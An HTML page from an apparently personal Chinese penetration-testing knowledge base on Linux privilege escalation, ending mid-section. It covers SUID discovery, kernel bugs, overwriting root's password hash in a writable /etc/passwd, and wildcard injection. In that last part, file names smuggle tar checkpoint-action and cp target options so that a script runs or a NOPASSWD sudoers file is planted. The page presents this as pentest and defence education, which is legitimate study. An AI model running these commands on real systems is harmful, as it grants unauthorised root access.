<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-个人知识库/渗透测试/内网渗透/Linux提权/README" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.9.1">
<title data-rh="true">Linux提权 | wjlin0</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://blog.wjlin0.com/en/img/docusaurus-social-card.jpg"><meta data-rh="true" name="twitter:image" content="https://blog.wjlin0.com/en/img/docusaurus-social-card.jpg"><meta data-rh="true" property="og:url" content="https://blog.wjlin0.com/en/docs/个人知识库/渗透测试/内网渗透/Linux提权/"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" property="og:locale:alternate" content="zh"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="Linux提权 | wjlin0"><meta data-rh="true" name="description" content="|作者|修订时间|"><meta data-rh="true" property="og:description" content="|作者|修订时间|"><link data-rh="true" rel="icon" href="/en/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://blog.wjlin0.com/en/docs/个人知识库/渗透测试/内网渗透/Linux提权/"><link data-rh="true" rel="alternate" href="https://blog.wjlin0.com/docs/个人知识库/渗透测试/内网渗透/Linux提权/" hreflang="zh"><link data-rh="true" rel="alternate" href="https://blog.wjlin0.com/en/docs/个人知识库/渗透测试/内网渗透/Linux提权/" hreflang="en"><link data-rh="true" rel="alternate" href="https://blog.wjlin0.com/docs/个人知识库/渗透测试/内网渗透/Linux提权/" hreflang="x-default"><script data-rh="true" type="application/ld+json">{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Linux提权","item":"https://blog.wjlin0.com/en/docs/个人知识库/渗透测试/内网渗透/Linux提权/"}]}</script><link rel="stylesheet" href="/en/assets/css/styles.b3fb48aa.css">
<script src="/en/assets/js/runtime~main.63f31c9d.js" defer="defer"></script>
<script src="/en/assets/js/main.ec282de2.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<svg style="display: none;"><defs>
<symbol id="theme-svg-external-link" viewBox="0 0 24 24"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"/></symbol>
</defs></svg>
<script>!function(){var t=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();document.documentElement.setAttribute("data-theme",t||(window.matchMedia("(prefers-color-scheme: dark)").matches?"dark":"light")),document.documentElement.setAttribute("data-theme-choice",t||"system")}(),function(){try{const c=new URLSearchParams(window.location.search).entries();for(var[t,e]of c)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><link rel="preload" as="image" href="/en/img/logo.svg"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="theme-layout-navbar navbar navbar--fixed-top"><div class="navbar__inner"><div class="theme-layout-navbar-left navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/en/"><div class="navbar__logo"><img src="/en/img/logo.svg" alt="My Site Logo" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/en/img/logo.svg" alt="My Site Logo" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div><b class="navbar__title text--truncate">知识库</b></a><a href="https://www.wjlin0.com" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">博客<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a><a href="https://icp.wjlin0.com" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">ICP备案查询<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></div><div class="theme-layout-navbar-right navbar__items navbar__items--right"><a href="https://github.com/wjlin0/wjlin0.github.io" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">GitHub<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="system mode" aria-label="Switch between dark and light mode (currently system mode)"><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP systemToggleIcon_QzmC"><path fill="currentColor" d="m12 21c4.971 0 9-4.029 9-9s-4.029-9-9-9-9 4.029-9 9 4.029 9 9 9zm4.95-13.95c1.313 1.313 2.05 3.093 2.05 4.95s-0.738 3.637-2.05 4.95c-1.313 1.313-3.093 2.05-4.95 2.05v-14c1.857 0 3.637 0.737 4.95 2.05z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="theme-layout-main main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/en/docs/intro"><span title="intro" class="linkLabel_WmDU">intro</span></a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" href="/en/docs/个人知识库/渗透测试/信息收集/"><span title="个人知识库" class="categoryLinkLabel_W154">个人知识库</span></a></div><ul class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" tabindex="0" href="/en/docs/个人知识库/渗透测试/信息收集/"><span title="渗透测试" class="categoryLinkLabel_W154">渗透测试</span></a></div><ul class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-3 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist" tabindex="0" href="/en/docs/个人知识库/渗透测试/信息收集/"><span title="信息收集" class="categoryLinkLabel_W154">信息收集</span></a><button aria-label="Expand sidebar category &#x27;信息收集&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-3 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/渗透测试/WEB漏洞/SQL注入/"><span title="WEB漏洞" class="categoryLinkLabel_W154">WEB漏洞</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-3 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/渗透测试/工具使用/PathScan"><span title="工具使用" class="categoryLinkLabel_W154">工具使用</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-3 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" tabindex="0" href="/en/docs/个人知识库/渗透测试/内网渗透/MSF提权"><span title="内网渗透" class="categoryLinkLabel_W154">内网渗透</span></a></div><ul class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-4 menu__list-item"><a class="menu__link" tabindex="0" href="/en/docs/个人知识库/渗透测试/内网渗透/MSF提权"><span title="MSF提权" class="linkLabel_WmDU">MSF提权</span></a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-4 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist" tabindex="0" href="/en/docs/个人知识库/渗透测试/内网渗透/kubernetes/"><span title="内网渗透" class="categoryLinkLabel_W154">内网渗透</span></a><button aria-label="Expand sidebar category &#x27;内网渗透&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-4 menu__list-item"><a class="menu__link" tabindex="0" href="/en/docs/个人知识库/渗透测试/内网渗透/k3s安装/"><span title="k3s安装" class="linkLabel_WmDU">k3s安装</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-4 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/en/docs/个人知识库/渗透测试/内网渗透/Linux提权/"><span title="Linux提权" class="linkLabel_WmDU">Linux提权</span></a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-3 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/渗透测试/渗透手法/某大学渗透测试/"><span title="渗透手法" class="categoryLinkLabel_W154">渗透手法</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-3 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/渗透测试/免杀/fscan免杀/"><span title="免杀" class="categoryLinkLabel_W154">免杀</span></a></div></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/en/docs/个人知识库/渗透测试/基线检查/"><span title="基线检查" class="linkLabel_WmDU">基线检查</span></a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/漏洞复现/Thinkphp/Thinkphp5.0.22远程代码执行"><span title="漏洞复现" class="categoryLinkLabel_W154">漏洞复现</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/代码审计/Java/基础审计/JAVA反序列化漏洞"><span title="代码审计" class="categoryLinkLabel_W154">代码审计</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/疑难杂症/k3s/Traefik资源跨命名空间调用/"><span title="疑难杂症" class="categoryLinkLabel_W154">疑难杂症</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist" tabindex="0" href="/en/docs/个人知识库/语言知识/"><span title="语言知识" class="categoryLinkLabel_W154">语言知识</span></a><button aria-label="Expand sidebar category &#x27;语言知识&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/pathScan-doc/下载安装"><span title="pathScan-doc" class="categoryLinkLabel_W154">pathScan-doc</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/CTF/Knownsec/knownsec-ctf-09/"><span title="CTF" class="categoryLinkLabel_W154">CTF</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/工具分享/RAGFlow安装/"><span title="工具分享" class="categoryLinkLabel_W154">工具分享</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/漏洞合集/中间件/Apache/Kafka Connect任意文件读取漏洞（CVE-2025-27817）"><span title="漏洞合集" class="categoryLinkLabel_W154">漏洞合集</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/en/docs/个人知识库/公众号文章/Perplexity Pro免费获取一年订阅"><span title="公众号文章" class="categoryLinkLabel_W154">公众号文章</span></a></div></li></ul></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/en/docs/更新日志"><span title="更新日志" class="linkLabel_WmDU">更新日志</span></a></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/en/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">个人知识库</span></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">渗透测试</span></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">内网渗透</span></li><li class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link">Linux提权</span></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">On this page</button></div><div class="theme-doc-markdown markdown"><header><h1>Linux提权</h1></header>
<table><thead><tr><th style="text-align:left">作者</th><th style="text-align:left">修订时间</th></tr></thead><tbody><tr><td style="text-align:left"><img decoding="async" loading="lazy" src="https://img.shields.io/badge/wjlin0-%E4%B8%AA%E4%BA%BA%E7%9F%A5%E8%AF%86%E5%BA%93-green" alt="wjlin0" class="img_ev3q"></td><td style="text-align:left">2025-10-15 00:34:06</td></tr></tbody></table>
<h1>Linux 提权文档</h1>
<h1>Linux 提权文档</h1>
<p>Linux 提权是指通过多种技术手段，利用系统漏洞或配置错误，获取比当前用户权限更高的操作权限（通常为 root 权限）。本文记录了常见的 Linux 提权方式，适用于系统安全研究、渗透测试以及提升 Linux 系统的安全性。</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="前言">前言<a href="#前言" class="hash-link" aria-label="Direct link to 前言" title="Direct link to 前言" translate="no">​</a></h2>
<p>在渗透测试和安全审计过程中，提权是一个常见的任务。无论是通过不当配置、漏洞利用，还是通过滥用系统权限，提权都能让攻击者提升对目标系统的控制。本文旨在介绍常见的 Linux 提权方式以及如何防范这些攻击。</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="基础知识">基础知识<a href="#基础知识" class="hash-link" aria-label="Direct link to 基础知识" title="Direct link to 基础知识" translate="no">​</a></h2>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="手册">手册<a href="#手册" class="hash-link" aria-label="Direct link to 手册" title="Direct link to 手册" translate="no">​</a></h3>
<ul>
<li><a href="https://gtfobins.github.io/" target="_blank" rel="noopener noreferrer">GTFOBins</a></li>
<li><a href="https://man7.org/linux/man-pages/man7/capabilities.7.html" target="_blank" rel="noopener noreferrer">capabilities(7) - Linux manual page</a></li>
</ul>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="用户和权限">用户和权限<a href="#用户和权限" class="hash-link" aria-label="Direct link to 用户和权限" title="Direct link to 用户和权限" translate="no">​</a></h3>
<p>Linux 系统使用 <strong>用户（UID）</strong> 和 <strong>组（GID）</strong> 来管理不同用户的权限。每个文件和目录都有 <strong>所有者</strong> 和 <strong>权限</strong>（例如：<code>rwxr-xr-x</code>），并且会定义对文件的读取、写入和执行的访问控制。</p>
<p>常见的用户权限有：</p>
<ul>
<li><code>r</code>：读取权限</li>
<li><code>w</code>：写入权限</li>
<li><code>x</code>：执行权限</li>
</ul>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="suid-和-sgid">SUID 和 SGID<a href="#suid-和-sgid" class="hash-link" aria-label="Direct link to SUID 和 SGID" title="Direct link to SUID 和 SGID" translate="no">​</a></h3>
<ul>
<li><strong>SUID（Set User ID）</strong>：当一个文件被设置了 SUID 位时，执行该文件的用户将获得文件所有者的权限，而不仅仅是当前用户的权限。通常用于程序需要用 root 权限执行的情况，如 <code>ping</code>。</li>
<li><strong>SGID（Set Group ID）</strong>：与 SUID 类似，但它让程序以文件所属组的身份运行。</li>
</ul>
<p>查看文件是否设置了 SUID/SGID，可以使用 <code>ls -l</code> 命令。</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="linux-capabilities">Linux Capabilities<a href="#linux-capabilities" class="hash-link" aria-label="Direct link to Linux Capabilities" title="Direct link to Linux Capabilities" translate="no">​</a></h3>
<p>Linux capabilities 是比传统的 root 权限更细粒度的权限管理方式。通过 <strong><code>setcap</code></strong> 命令，可以为进程或文件设置特定的能力，例如网络访问、文件管理等，而不需要完全的 root 权限。</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="提权方法">提权方法<a href="#提权方法" class="hash-link" aria-label="Direct link to 提权方法" title="Direct link to 提权方法" translate="no">​</a></h2>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="suid-提权">SUID 提权<a href="#suid-提权" class="hash-link" aria-label="Direct link to SUID 提权" title="Direct link to SUID 提权" translate="no">​</a></h3>
<p>SUID 提权是最常见的提权方式之一。通过利用 SUID 位，用户可以在执行某些特权命令时获取 root 权限。</p>
<ul>
<li><strong>查找 SUID 文件</strong>：</li>
</ul>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">find / -type f -perm -4000 2&gt;/dev/null</span><br></span></code></pre></div></div>
<ul>
<li><strong>利用 SUID 提权</strong>：假设 <code>find</code> 工具是 SUID 文件，且具有执行 <code>root</code> 权限，攻击者可以通过操控该工具达到提权。</li>
</ul>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="linux-内核漏洞">Linux 内核漏洞<a href="#linux-内核漏洞" class="hash-link" aria-label="Direct link to Linux 内核漏洞" title="Direct link to Linux 内核漏洞" translate="no">​</a></h3>
<p>内核漏洞可以为攻击者提供直接的 root 提权。通过利用系统中的漏洞，攻击者可以执行特定的恶意代码，从而获得完整的 root 权限。</p>
<ul>
<li><strong>常见的内核漏洞</strong>：<!-- -->
<ul>
<li><strong>Dirty COW 漏洞</strong>：一个著名的内核漏洞，攻击者通过该漏洞可以在没有 root 权限的情况下修改内核内存。</li>
<li><strong>Local Root Exploits</strong>：许多内核漏洞可以让本地用户通过提升自己的权限获得 root 权限。</li>
</ul>
</li>
</ul>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="passwd提权">Passwd提权<a href="#passwd提权" class="hash-link" aria-label="Direct link to Passwd提权" title="Direct link to Passwd提权" translate="no">​</a></h3>
<p><strong>passwd 文件提权</strong> 是通过篡改 <code>/etc/passwd</code> 文件中的某个用户（通常是 root）的密码字段，达到提权目的。由于某些系统或配置中 <code>/etc/shadow</code> 不被使用（或 root 使用的是 passwd 中的密码），攻击者可以将 <code>/etc/passwd</code> 中 root 的密码字段替换为一个已知的 hash，从而使用 su 提权成为 root。</p>
<p>攻击步骤如下：</p>
<p>首先生成一个已知密码的 hash，例如使用 openssl：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">openssl passwd -1 -salt xyz 123456</span><br></span></code></pre></div></div>
<p>输出示例：</p>
<div class="language-swift codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-swift codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token short-argument">$1</span><span class="token plain">$xyz$4zT7eWz8bszUOwhcGHM3E1</span><br></span></code></pre></div></div>
<p>然后编辑 <code>/etc/passwd</code> 文件，将 root 那一行的密码字段替换成上述 hash，比如原本是：</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">root:x:0:0:root:/root:/bin/bash</span><br></span></code></pre></div></div>
<p>修改为：</p>
<div class="language-ruby codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-ruby codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">root:$1$xyz$4zT7eWz8bszUOwhcGHM3E1:0:0:root:/root:/bin/bash</span><br></span></code></pre></div></div>
<p>保存后，使用 <code>su</code> 命令切换到 root 用户，并输入你设置的密码（这里是 123456）即可完成提权。</p>
<p>该方式需要目标系统的 <code>/etc/passwd</code> 可写，通常配合某些提权手段（如程序错误设置了 <code>passwd</code> 为 777）一起使用，属于典型的“低权限可写敏感配置文件”类型的提权方式。</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="wildcard提权">Wildcard提权<a href="#wildcard提权" class="hash-link" aria-label="Direct link to Wildcard提权" title="Direct link to Wildcard提权" translate="no">​</a></h3>
<p><strong>wildcard 通配符提权</strong> 是 Linux 提权的一种方式，攻击者可以利用某些命令（如 <code>tar</code>、<code>cp</code> 等）在处理带有通配符 <code>*</code> 时会解析特定参数或行为，从而执行恶意命令或操作文件实现提权。例如，当有 <code>sudo tar -cf archive.tar *</code> 的权限时，攻击者可以创建特殊参数文件：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">echo &#x27;echo pwned &gt; /tmp/rooted&#x27; &gt; exploit.sh</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">chmod +x exploit.sh</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">touch &quot;--checkpoint=1&quot;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">touch &quot;--checkpoint-action=exec=./exploit.sh&quot;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">sudo tar -cf archive.tar *</span><br></span></code></pre></div></div>
<p>这样在打包时 <code>tar</code> 会自动执行 <code>./exploit.sh</code>，从而执行任意命令。</p>
<p>另一个常见例子是 <code>cp</code> 命令。当存在 <code>sudo cp * /etc/</code> 权限时，攻击者可以通过构造选项注入和目标文件实现提权：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">echo &#x27;youruser ALL=(ALL) NOPASSWD:ALL&#x27; &gt; sudoers</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">touch &quot;--target-directory=/etc&quot;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">touch &quot;--no-preserve=ownership&quot;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">sudo cp * /etc/</span><br></span></code></pre></div></div>
<p>这样可能将伪造的 <code>sudoers</code> 文件复制到 <code>/etc/sudoers</code>，实现免密码 sudo 提权。</p>
<p>还可以结合 <code>cp -L</code> 选项进行利用，例如：</p>
